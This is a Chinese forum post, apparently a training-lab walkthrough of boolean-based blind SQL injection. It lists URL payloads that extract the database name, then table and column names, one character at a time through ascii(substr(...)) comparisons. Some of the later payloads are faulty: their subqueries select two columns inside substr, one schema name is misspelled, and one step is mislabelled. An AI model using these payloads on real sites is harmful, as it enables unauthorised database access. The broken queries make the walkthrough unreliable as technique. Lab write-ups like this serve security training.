6.2.1-SQL注入-盲注Rank 1

繁夜   ·   发表于 2019-02-15 12:19:44   ·   技术文章投稿区

进入靶场 输入id=1


盲注的话只有成功与不成功 那么我们语句就需要改变一下了 输入下面这段话 如果当前表明是8个字 那么就正常显示出来了

?id=1' and (length(database()))=8;--+


接下来开始爆asii字符了

?id=1' and (ascii(substr(database(),1,1)))=115;--+

这行代码的意思呢我们要从里面开始读

substr的意思就是截取字符串 截取什么呢 截取 database()下 的第一个字符串,截取一个然后后面经过ascii码 如果等于115的话 就能成功执行 115再asii里面代表的代表字符串 s  那么说明这个数据库第一个字是s

同理一个一个爆下去

?id=1' and (ascii(substr(database(),2,1)))=99;--+

代表数据库第二个字符串 99是字符串 c 

多试几次就能把数据库名字爆出来 接下来爆表

?id=1' and (ascii(substr((select 1,table_name from information_schema.tables where table_schema='scurity' limit 0,1),1,1)))=122;--+

接下来爆字段

?id=1' and (ascii(substr((select 1,column_name from information_schema.columns where table_name='zkaq' limit 0,1),1,1)))=122;--+

最后爆flag原理同上

打赏我,让我更有动力~

1 Reply   |  Until 2019-2-15 | 1022 View

Track-聂风
发表于 2019-2-15

请提交手注

评论列表

  • 加载数据中...

编写评论内容
LoginCan Publish Content
返回顶部 投诉反馈

© 2016 - 2022 掌控者 All Rights Reserved.